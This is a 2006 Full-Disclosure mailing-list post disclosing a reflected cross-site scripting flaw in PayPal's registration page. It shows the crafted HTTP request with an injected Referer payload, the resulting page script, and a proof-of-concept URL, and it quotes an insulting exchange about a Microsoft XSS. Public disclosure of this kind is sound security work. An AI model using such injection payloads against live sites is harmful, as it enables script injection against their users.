[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 8 Aug 2006 15:51:35 +0200
From: "Thomas Pollet" <thomas.pollet@...il.com>
To: penetrator@...e.in.th
Cc: full-disclosure@...ts.grok.org.uk
Subject: paypal.com xss (was Re: micosoft.com xss)
Man you suck, codes or stfu.
I know the code is broken in more than 1 place, i tried registering event
handlers, exiting jscript etc. etc. time to move on....
point is xss is everywhere, trust noone etc. etc.
To make my point clear... last of the xss@...pal...
GET https://www.paypal.com/cgi-bin/webscr?cmd=_registration-run HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/msword, application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, */*
Referer:
https://www.paypal.com/cgi-bin/webscr?cmd=_help-ext&source_page=_profile-comparison
";alert("xss");var%20f="
results in
....
<script type="text/javascript">
<!--
/* SiteCatalyst Variables */
s.pageName="SignUp:Landing Page";
s.prop11="general/SignupInitial.xsl::_registration-run::0";
s.channel="Sign Up:Landing Page";
s.r="
https://www.paypal.com/cgi-bin/webscr?cmd=_help-ext&source_page=_profile-comparison
";alert("xss");var%20f="";
s.prop7="Unknown";
s.prop8="Unknown";
s.prop9="Unknown";
s.prop10="US";
s.prop12="Unknown";
s.visitorSampling="20";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code) // -->
</script>
in other words.... referer url isn't correctly cleaned for paypal
registration page and used for js var.
poc: go to
https://www.paypal.com/cgi-bin/webscr?cmd=_help-ext&source_page=_profile-comparison
";alert("xss");s.r="
and click on the sign up link
Have a nice life, die soon,
Thomas
On 08/08/06, Mad World <penetrator@...e.in.th> wrote:
>
> Good morning !
>
> You can doubt, it's your right to do so.
> Wanna bet ?
> Just open your eyes and your nose will show you that you are actually
> braking silly structure of page in more than one place ..
> I's relatively easy using the same exact place of code you tried to make
> it.
> I have working example, it is based on other microsoft "features" as well.
>
> Greets,
> - Mad World
>
> --- thomas.pollet@...il.com wrote:
>
> From: "Thomas Pollet" <thomas.pollet@...il.com>
> To: penetrator@...e.in.th
> Cc: full-disclosure@...ts.grok.org.uk
> Subject: Re: [Full-disclosure] Re: micosoft.com xss
> Date: Tue, 8 Aug 2006 10:18:56 +0200
>
> On 08/08/06, Mad World <penetrator@...e.in.th> wrote:
>
> Why do you need it ?
> You already discovered xss, the rest of "job" is just matter
> of technique.
> I think majority of xss submitters here could do it by
> various means.
> M$ is lost in its own complexity of how to do simple things.
> If you could ever give me reasonable answer for why do you
> need this $hit - I could give you the "rest", like others
> could.
>
> I doubt you actually tried getting js executed on page load
> (for some reason they try to prevent xss in a number of ways).
> I did try and didn't succeed, that's why I ask.
> Greets,
> Thomas
>
>
>
> _____________________________________________________________
> Visit Thailand @ http://www.sawadee.com
> Websearch and email: DNSASIA.com .... FAST!
> 128k dialup: login.samuinet.com
>
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists